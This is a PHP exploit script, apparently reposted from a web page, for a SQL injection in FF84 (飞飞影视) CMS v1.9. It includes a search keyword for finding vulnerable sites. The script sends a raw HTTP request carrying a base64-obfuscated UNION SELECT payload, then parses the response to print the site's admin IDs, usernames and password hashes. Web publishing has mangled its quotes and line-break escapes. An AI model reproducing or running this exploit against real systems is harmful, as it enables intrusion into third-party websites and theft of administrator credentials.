< ? php /** * 飞飞影视管理系统 SQL injection * 飞飞影视系统PHP版 v1.9 injection exploit * by:www.08sec.com fans * keyword “Powered by www.ff84.com” */ error_reporting(E_ERROR); set_time_limit(0); if ($argc<3) { print_r(‘ —————————————————— Usage: php ‘.$argv[0].’ host path host: target server (ip/hostname),without”http://” path: path to ff84cms Example: php ‘.$argv[0].’ localhost / ——————————————————- ‘); die; } $host=$argv[1]; $path=$argv[2]; $html=”; $cookie=”"; $agent=” User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1″; $content =”"; $data = “POST /?s=vod-read-id-1″.base64_decode(‘JTIwYW5kJTIwMT0yJTIwdW5pb24lMjBzZWxlY3QlMjAxLDIsMyw0LDUsNiw3LDgsOSwxMCwxMSwxMiwxMywxNCwxNSwxNiwxNywxOCwxOSwyMCwyMSwyMiwyMywyNCwyNSwyNixjb25jYXQoMHg0MCxhZG1pbl9pZCwweDQwLGFkbWluX25hbWUsMHg0MCxhZG1pbl9wd2QsMHg0MCksMjgsMjklMjBmcm9tJTIwcHBfYWRtaW4tLQ==’).”html HTTP/1.1rn”; $data .= “Host: “.$host.”rn”; //$data .=”Cookie: “.$cookie.”rn”; $data .= “User-Agent: “.$agent. “rn”; $data .= “Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn”; $data .= “Accept-Language: zh-cn,zh;q=0.5rn”; $data .= “Accept-Encoding: gzip,deflatern”; $data .= “Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7rn”; $data .= “Connection: keep-alivern”; $data .= “Content-Type: application/x-www-form-urlencodedrn”; $data .= “Content-Length: “.strlen($content).”rnrn”; $data .= $content.”rn”; Sendpack($data); if (!eregi(“Tpl”,$html)){ // echo $packet.”rn”; // echo $html.”rn”; die(“Exploit failed…”); }else{ $pattern=”/@(.*)@/i”; preg_match($pattern,$html,$pg); echo “$pg[1]rnrn”; echo “rnExploit succeeded…rn”; } Function sendpack ($packet) { global $host, $html; $ock=fsockopen(gethostbyname($host),’80′); if (!$ock) { echo ‘No response from ‘.$host; die; } fputs($ock,$packet); $html=”; while (!feof($ock)) { $html.=fgets($ock); } fclose($ock); }